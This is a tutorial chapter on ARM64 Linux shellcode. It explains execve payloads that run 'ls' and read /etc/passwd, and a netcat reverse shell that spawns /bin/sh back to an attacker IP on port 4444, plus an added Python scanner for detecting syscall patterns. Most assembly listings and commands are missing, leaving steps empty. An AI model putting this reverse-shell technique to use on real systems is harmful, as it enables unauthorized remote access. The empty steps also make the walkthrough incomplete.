Chapter 5: Introduction to Shellcode
What is Shellcode?
Shellcode is a small piece of machine code used as the payload in the exploitation of software vulnerabilities. The name "shellcode" comes from its common purpose, which is to spawn a shell (a command-line interface).
Common Uses of Shellcode
Exploiting vulnerabilities in software to gain unauthorized access.
Demonstrating security flaws in software for educational purposes.
Basic ARM64 Shellcode: Executing a Command
Let's start with a simple shellcode that executes the "ls" command:
Compiling and Running the Basic Shellcode
Save the shellcode in a file named ls_shellcode.s
Assemble:
as ls_shellcode.s -o ls_shellcode.o
Link:
ld ls_shellcode.o -o ls_shellcode
Make executable:
chmod +x ls_shellcode
Run:
./ls_shellcode
Understanding the Basic Shellcode
The shellcode uses the execve system call to execute "/bin/ls".
It sets up the arguments on the stack.
The system call number (221 for execve on Linux arm64) is placed in x8.
The svc #0 instruction triggers the system call.
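A defender-side complement to the explanation above, added here and not part of the original chapter: a small Python scanner that flags the mov x8, #N / svc #0 pairing this shellcode relies on, so the same two facts (syscall number in x8, svc #0 to trap) can be used for detection. The instruction masks are taken from the AArch64 MOVZ and SVC encodings, the sample buffer is constructed for the demonstration, and SYSCALL_NAMES covers only the numbers the page names.

```python
import struct

# Fixed AArch64 encodings (architecture reference manual):
#   MOVZ <Xd|Wd>, #imm16 (hw=0): bits[30:21] == 0b1010010100, imm16 in bits[20:5], Rd in bits[4:0]
#   SVC #0                      : 0xD4000001 (the `svc #0` the page's shellcode uses)
MOVZ_MASK, MOVZ_BITS = 0x7FE00000, 0x52800000
SVC_0 = 0xD4000001
X8 = 8                      # Linux arm64 passes the syscall number in x8

# Linux arm64 syscall numbers named on the page
SYSCALL_NAMES = {221: "execve", 93: "exit"}

def movz_x8_imm(insn):
    """Immediate of `mov x8, #imm` / `mov w8, #imm` (MOVZ, no shift), or None."""
    if (insn & MOVZ_MASK) == MOVZ_BITS and (insn & 0x1F) == X8:
        return (insn >> 5) & 0xFFFF
    return None

def find_syscalls(buf, window=16):
    """Scan a byte buffer for `mov x8, #N` followed within `window` instructions by `svc #0`.

    Returns [(svc_offset, syscall_number, name)]. Every byte offset is tried because a
    captured buffer need not be 4-byte aligned; the mov and the svc must share alignment.
    Values built with movk/add instead of a single movz are not recognised by this heuristic.
    """
    hits = []
    last_movz = {}                          # alignment (offset % 4) -> (offset, imm)
    for off in range(0, len(buf) - 3):
        insn = struct.unpack_from("<I", buf, off)[0]
        imm = movz_x8_imm(insn)
        if imm is not None:
            last_movz[off % 4] = (off, imm)
            continue
        if insn == SVC_0 and off % 4 in last_movz:
            mov_off, imm = last_movz.pop(off % 4)
            if off - mov_off <= 4 * window:
                hits.append((off, imm, SYSCALL_NAMES.get(imm, "syscall %d" % imm)))
    return hits

# Constructed sample: a string, then `mov x8, #221; svc #0`, then `mov x8, #93; svc #0`
SAMPLE = (b"/bin/ls\x00"
          + bytes.fromhex("a81b80d2") + bytes.fromhex("010000d4")
          + bytes.fromhex("a80b80d2") + bytes.fromhex("010000d4"))

if __name__ == "__main__":
    for off, num, name in find_syscalls(SAMPLE):
        print("svc #0 at offset %d -> x8 = %d (%s)" % (off, num, name))
```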
Simple shellcode that executes "cat /etc/passwd":
Let's compile and run this:
Save this code in a file named cat_passwd.s
Assemble the code:
Link the object file:
Make it executable:
Run the shellcode:
This shellcode should execute successfully and display the contents of /etc/passwd.
nc reverse shell shellcode:
Detailed Explanation:
.global _start and .section .text: These directives tell the assembler where our code begins and that it should be placed in the text section of the executable.
adr x0, nc_path: Loads the address of the "/bin/nc" string into x0. This will be the program we execute.
mov x1, sp: We'll use the stack to store our array of arguments. This moves the current stack pointer into x1.
str x0, [x1]: Stores the address of "/bin/nc" as the first argument in our array.
The next few adr and str instructions load the addresses of our other arguments ("-e", "/bin/sh", IP, port) and store them in the array.
mov x2, #0 and str x2, [x1, #40]: This NULL-terminates our argument array.
mov x8, #221: Loads the syscall number for execve into x8.
svc #0: Triggers the syscall, executing netcat with our arguments.
The last part is an exit syscall in case execve fails.
The .asciz directives at the end define our string constants.
Step-by-step Instructions:
Save the code in a file named nc_reverse_shell.s
Assemble the code:
This creates an object file from our assembly code.
Link the object file:
This creates an executable from our object file.
Make the file executable:
On your attacking machine (192.168.142.131), start a listener:
This listens for incoming connections on port 4444.
On the target machine, run the shellcode:
This approach uses netcat directly, which is often available on Unix-like systems. It's simpler than creating a raw socket connection and should be more reliable. However, it does require netcat to be installed on the target system.